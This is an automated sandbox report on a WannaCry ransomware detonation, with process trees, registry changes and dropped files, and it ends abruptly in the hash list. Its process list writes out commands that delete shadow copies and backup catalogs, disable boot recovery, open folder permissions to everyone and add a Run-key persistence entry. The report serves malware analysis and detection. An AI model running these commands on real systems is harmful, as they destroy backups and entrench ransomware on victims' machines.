Malware Analysis Report

2025-01-22 20:09

Sample ID 241016-yam35sybkd
Target shitting slander.mp4
SHA256 0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e
Tags
wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm
score
10/10

Analysis Overview

Threat Level: Known bad

The file shitting slander.mp4 was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Wannacry

Deletes shadow copies

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Modifies file permissions

Loads dropped DLL

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Adds Run key to start application

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies registry key

Modifies data under HKEY_USERS

Interacts with shadow copies

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Views/modifies file attributes

NTFS ADS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 19:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 19:35

Reported

2024-10-16 19:41

Platform

win10-20240404-en

Max time kernel

386s

Max time network

389s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5231.tmp C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5238.tmp C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kxmrwtygyk434 = "\"C:\\Users\\Admin\\Downloads\\RANSOMWARE-WANNACRY-2.0-master\\RANSOMWARE-WANNACRY-2.0-master\\Ransomware.WannaCry\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A

Enumerates connected drives


File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\421858948\2704036608.pri C:\Windows\system32\LogonUI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Checks processor information in registry


Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies data under HKEY_USERS


Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master(1).zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\You-Are-An-Idiot-main.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken


Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected] N/A
N/A N/A C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 164 wrote to memory of 3668 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Program Files (x86)\Windows Media Player\setup_wm.exe
PID 164 wrote to memory of 4932 N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe C:\Windows\SysWOW64\unregmp2.exe
PID 4932 wrote to memory of 1124 N/A C:\Windows\SysWOW64\unregmp2.exe C:\Windows\System32\unregmp2.exe
PID 2312 wrote to memory of 4584 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 1716 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4584 wrote to memory of 4728 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\System32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.0.1632826779\482042872" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1516 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f372c4fc-e3e5-4b12-a97d-5439bbbc5097} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1780 14ba62e6e58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.1.1011365000\1064549107" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6255b330-1d12-40cd-9ccd-784d380abfd6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2136 14ba5e32f58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.2.380441002\2121190577" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2864 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {568ccfb8-b9a0-494f-8314-053e9829b7c6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2880 14baa59bc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.3.1910753217\1322760908" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3c6767c-0937-4f19-a67c-c9e66908780c} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3588 14baabc2a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.4.754300354\1905143269" -childID 3 -isForBrowser -prefsHandle 3604 -prefMapHandle 3268 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f6a6ce6-0639-49b8-96dc-8a6ee2d21db2} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3924 14babb30258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.5.1442828929\29876377" -childID 4 -isForBrowser -prefsHandle 4812 -prefMapHandle 4488 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c510274-ed65-493a-85dc-ca3d6dfa148e} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4824 14bac682b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.6.1307488610\724575438" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e92dc18-1361-467a-b7bb-2dd3ad95dfa7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4956 14bad035858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.7.1889428556\905682613" -childID 6 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df0c7d4-32d0-46ce-9d9b-23a65d4ce8f1} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 5152 14bad032858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.8.580235843\1059299835" -childID 7 -isForBrowser -prefsHandle 2648 -prefMapHandle 2644 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec5f425-d64c-4c43-9f22-de0cda601af7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2660 14bae2dab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.9.470533679\633976505" -childID 8 -isForBrowser -prefsHandle 4884 -prefMapHandle 4468 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca88035-a5c5-494f-9bc4-9260af854c58} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4872 14b9b26a558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.10.1871038213\1190940077" -childID 9 -isForBrowser -prefsHandle 4600 -prefMapHandle 3944 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {374f9e5a-7806-4f1e-b94d-f8503db05a8a} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4816 14b9b22d558 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.csproj.FileListAbsolute.txt

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.11.221279094\153739102" -childID 10 -isForBrowser -prefsHandle 6320 -prefMapHandle 6280 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {787e0501-1a3d-4753-870f-18343e84baee} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6328 14baccd2558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.12.1332645582\1475824575" -childID 11 -isForBrowser -prefsHandle 5388 -prefMapHandle 6220 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {136114bf-28d2-49fc-bff6-0572fdde6c24} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6292 14baecc1058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.0.820577293\2066161052" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1600 -prefsLen 21145 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e31b9e-88cd-4cbb-89ca-5265a21f1fe3} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 1704 20920cfa758 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.1.393268130\312030324" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21190 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fbd7c12-8d71-43df-8433-2db82c44e0b6} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2004 2090ebe6458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.2.586240356\1866142644" -childID 1 -isForBrowser -prefsHandle 2712 -prefMapHandle 2708 -prefsLen 21651 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a4c3270-0384-4024-a211-fcfe7ce8d17d} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2724 20924847958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.3.1393738457\1864504748" -childID 2 -isForBrowser -prefsHandle 3276 -prefMapHandle 2732 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb94f36-7a1e-4811-81e3-723e2dec2a85} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3288 209259e9358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.4.243577776\1733291937" -childID 3 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a65a7575-5a9d-458b-8191-9ec1f07edd91} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3984 20926bbdb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.5.1286275282\66111482" -childID 4 -isForBrowser -prefsHandle 4548 -prefMapHandle 4544 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acdfb0a5-814c-443e-b80d-fdca19bc23a2} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4572 2092795b758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.6.217863551\953537729" -childID 5 -isForBrowser -prefsHandle 4712 -prefMapHandle 4716 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eecc973b-01b7-4e54-8c6b-f11cd18198ce} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4704 2092795c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.7.695365373\1592387224" -childID 6 -isForBrowser -prefsHandle 4904 -prefMapHandle 4908 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7451cbf-e91b-4112-8eee-e9e36558cd1a} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4896 2092795cc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.8.650729503\1253576218" -childID 7 -isForBrowser -prefsHandle 3812 -prefMapHandle 4232 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48aa7dc7-de7e-43b3-900a-e11449a13639} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4176 209281c8558 tab

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 257181729107569.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected] vs

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe

"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]"

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe

taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe

taskdl.exe

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3af4855 /state1:0x41c64e6d

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log


C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML


C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\db\data.safe.bin


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\6e961a22-4af6-4ba8-b0a5-b310c9e0656d


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\datareporting\glean\pending_pings\9e0d0e94-9fbd-425d-9b0a-70e79f817266


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 0d0013d9708d9fef539adc917f5b87f6
SHA1 5e071e6b4d8abf007c8bb78ee948caf5bb0439e1
SHA256 f416d29cdbaa66b7d04483831d2a593a735316fafb643414a12df78da0ab054b
SHA512 851e9965a0fed9e0f5195ce655635cf13687d18678e4a9df807ab22cbc53c02cd2006fd65d93cd80b2a06d709e59122ea9933ba5cec551c6d51f5e9b4c175388

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 34775a999d72cffb22acbd0b7d98aaa6
